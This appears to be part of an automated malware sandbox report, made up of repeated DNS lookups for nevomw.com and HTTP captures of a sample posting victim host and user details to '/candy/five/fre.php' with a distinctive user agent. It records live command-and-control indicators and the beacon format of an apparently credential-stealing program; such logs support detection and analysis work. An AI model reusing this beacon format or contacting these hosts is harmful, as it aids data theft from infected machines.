                                            Dec 2, 2020 11:53:46.755785942 CET8.8.8.8192.168.2.60xd3f1No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:46.755785942 CET8.8.8.8192.168.2.60xd3f1No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.161921024 CET8.8.8.8192.168.2.60xc1ebNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.161921024 CET8.8.8.8192.168.2.60xc1ebNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.599958897 CET8.8.8.8192.168.2.60x690aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.599958897 CET8.8.8.8192.168.2.60x690aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.022881031 CET8.8.8.8192.168.2.60xa50No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.022881031 CET8.8.8.8192.168.2.60xa50No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.435914993 CET8.8.8.8192.168.2.60x1b9bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.435914993 CET8.8.8.8192.168.2.60x1b9bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.868055105 CET8.8.8.8192.168.2.60x494bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.868055105 CET8.8.8.8192.168.2.60x494bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.289485931 CET8.8.8.8192.168.2.60x291dNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.289485931 CET8.8.8.8192.168.2.60x291dNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.663352013 CET8.8.8.8192.168.2.60x2409No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.663352013 CET8.8.8.8192.168.2.60x2409No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.073008060 CET8.8.8.8192.168.2.60xec53No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.073008060 CET8.8.8.8192.168.2.60xec53No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.461335897 CET8.8.8.8192.168.2.60x9c3aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.461335897 CET8.8.8.8192.168.2.60x9c3aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.921871901 CET8.8.8.8192.168.2.60x799fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.921871901 CET8.8.8.8192.168.2.60x799fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.441720009 CET8.8.8.8192.168.2.60xcf48No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.441720009 CET8.8.8.8192.168.2.60xcf48No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.810755968 CET8.8.8.8192.168.2.60xcd04No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.810755968 CET8.8.8.8192.168.2.60xcd04No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.199002981 CET8.8.8.8192.168.2.60x3126No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.199002981 CET8.8.8.8192.168.2.60x3126No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.612660885 CET8.8.8.8192.168.2.60xa957No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.612660885 CET8.8.8.8192.168.2.60xa957No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.033998966 CET8.8.8.8192.168.2.60x455No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.033998966 CET8.8.8.8192.168.2.60x455No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.416918993 CET8.8.8.8192.168.2.60x37f3No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.416918993 CET8.8.8.8192.168.2.60x37f3No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.838108063 CET8.8.8.8192.168.2.60x3db8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.838108063 CET8.8.8.8192.168.2.60x3db8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.235838890 CET8.8.8.8192.168.2.60xe762No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.235838890 CET8.8.8.8192.168.2.60xe762No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.656433105 CET8.8.8.8192.168.2.60x9e82No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.656433105 CET8.8.8.8192.168.2.60x9e82No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.077317953 CET8.8.8.8192.168.2.60x58deNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.077317953 CET8.8.8.8192.168.2.60x58deNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.459783077 CET8.8.8.8192.168.2.60xb965No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.459783077 CET8.8.8.8192.168.2.60xb965No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.877650976 CET8.8.8.8192.168.2.60xdae0No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.877650976 CET8.8.8.8192.168.2.60xdae0No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.276166916 CET8.8.8.8192.168.2.60xad39No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.276166916 CET8.8.8.8192.168.2.60xad39No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.674808979 CET8.8.8.8192.168.2.60x7da5No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.674808979 CET8.8.8.8192.168.2.60x7da5No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.063438892 CET8.8.8.8192.168.2.60x4cd8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.063438892 CET8.8.8.8192.168.2.60x4cd8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.458266973 CET8.8.8.8192.168.2.60x1880No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.458266973 CET8.8.8.8192.168.2.60x1880No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.913239002 CET8.8.8.8192.168.2.60x648cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.913239002 CET8.8.8.8192.168.2.60x648cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.299415112 CET8.8.8.8192.168.2.60x514cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.299415112 CET8.8.8.8192.168.2.60x514cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.685028076 CET8.8.8.8192.168.2.60xba0dNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.685028076 CET8.8.8.8192.168.2.60xba0dNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.106694937 CET8.8.8.8192.168.2.60x90cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.106694937 CET8.8.8.8192.168.2.60x90cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.500181913 CET8.8.8.8192.168.2.60xbdf9No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.500181913 CET8.8.8.8192.168.2.60xbdf9No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.940876961 CET8.8.8.8192.168.2.60x6ecbNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.940876961 CET8.8.8.8192.168.2.60x6ecbNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.334629059 CET8.8.8.8192.168.2.60xa4edNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.334629059 CET8.8.8.8192.168.2.60xa4edNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.741585016 CET8.8.8.8192.168.2.60x49b8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.741585016 CET8.8.8.8192.168.2.60x49b8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.147563934 CET8.8.8.8192.168.2.60x1f48No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.147563934 CET8.8.8.8192.168.2.60x1f48No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.536607981 CET8.8.8.8192.168.2.60x6a03No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.536607981 CET8.8.8.8192.168.2.60x6a03No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.983613968 CET8.8.8.8192.168.2.60x917eNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.983613968 CET8.8.8.8192.168.2.60x917eNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.424917936 CET8.8.8.8192.168.2.60xb219No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.424917936 CET8.8.8.8192.168.2.60xb219No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.809814930 CET8.8.8.8192.168.2.60xedd8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.809814930 CET8.8.8.8192.168.2.60xedd8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.345489025 CET8.8.8.8192.168.2.60x3075No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.345489025 CET8.8.8.8192.168.2.60x3075No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.757989883 CET8.8.8.8192.168.2.60x441eNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.757989883 CET8.8.8.8192.168.2.60x441eNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.168210030 CET8.8.8.8192.168.2.60xcf0fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.168210030 CET8.8.8.8192.168.2.60xcf0fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.626287937 CET8.8.8.8192.168.2.60xd7c9No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.626287937 CET8.8.8.8192.168.2.60xd7c9No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.023329020 CET8.8.8.8192.168.2.60x70ffNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.023329020 CET8.8.8.8192.168.2.60x70ffNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.644040108 CET8.8.8.8192.168.2.60xc671No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.644040108 CET8.8.8.8192.168.2.60xc671No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.055572033 CET8.8.8.8192.168.2.60x5979No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.055572033 CET8.8.8.8192.168.2.60x5979No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.453480005 CET8.8.8.8192.168.2.60xc8aaNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.453480005 CET8.8.8.8192.168.2.60xc8aaNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.849554062 CET8.8.8.8192.168.2.60x2a0fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.849554062 CET8.8.8.8192.168.2.60x2a0fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.314105034 CET8.8.8.8192.168.2.60x3c98No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.314105034 CET8.8.8.8192.168.2.60x3c98No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.688730955 CET8.8.8.8192.168.2.60x5e6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.688730955 CET8.8.8.8192.168.2.60x5e6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.060218096 CET8.8.8.8192.168.2.60x1ca3No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.060218096 CET8.8.8.8192.168.2.60x1ca3No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.444842100 CET8.8.8.8192.168.2.60xc7adNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • nevomw.com

                                            HTTP Packets

                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            0 | 192.168.2.6 | 49712 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:41.429219961 CET | 57 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 196
                                            Connection: close
                                            Dec 2, 2020 11:52:41.481232882 CET | 57 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: 'ckav.ruengineer367706DESKTOP-716T771k08F9C4E9C79A3B52B3F739430dit5F
                                            Dec 2, 2020 11:52:41.556689978 CET | 57 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 15
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.6 | 49713 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:41.861237049 CET | 58 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 196
                                            Connection: close
                                            Dec 2, 2020 11:52:41.914042950 CET | 59 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: 'ckav.ruengineer367706DESKTOP-716T771+08F9C4E9C79A3B52B3F739430mUF2c
                                            Dec 2, 2020 11:52:41.989274979 CET | 59 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 15
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            10 | 192.168.2.6 | 49723 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:47.200282097 CET | 85 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:47.253993034 CET | 85 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:47.331655025 CET | 85 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            100 | 192.168.2.6 | 49841 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:29.835345984 CET | 1397 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:29.887763023 CET | 1397 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:29.961003065 CET | 1399 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            101 | 192.168.2.6 | 49843 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:30.245196104 CET | 1401 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:30.297722101 CET | 1405 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:30.371175051 CET | 1406 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            102 | 192.168.2.6 | 49844 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:30.625790119 CET | 1413 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:30.678523064 CET | 1413 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:30.751743078 CET | 1413 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            103 | 192.168.2.6 | 49845 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:31.037564993 CET | 1414 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:31.090195894 CET | 1415 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:31.164427042 CET | 1415 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            104 | 192.168.2.6 | 49846 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:31.503457069 CET | 1416 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:31.556354046 CET | 1416 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:31.630878925 CET | 1416 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            105 | 192.168.2.6 | 49847 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:31.875174999 CET | 1417 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
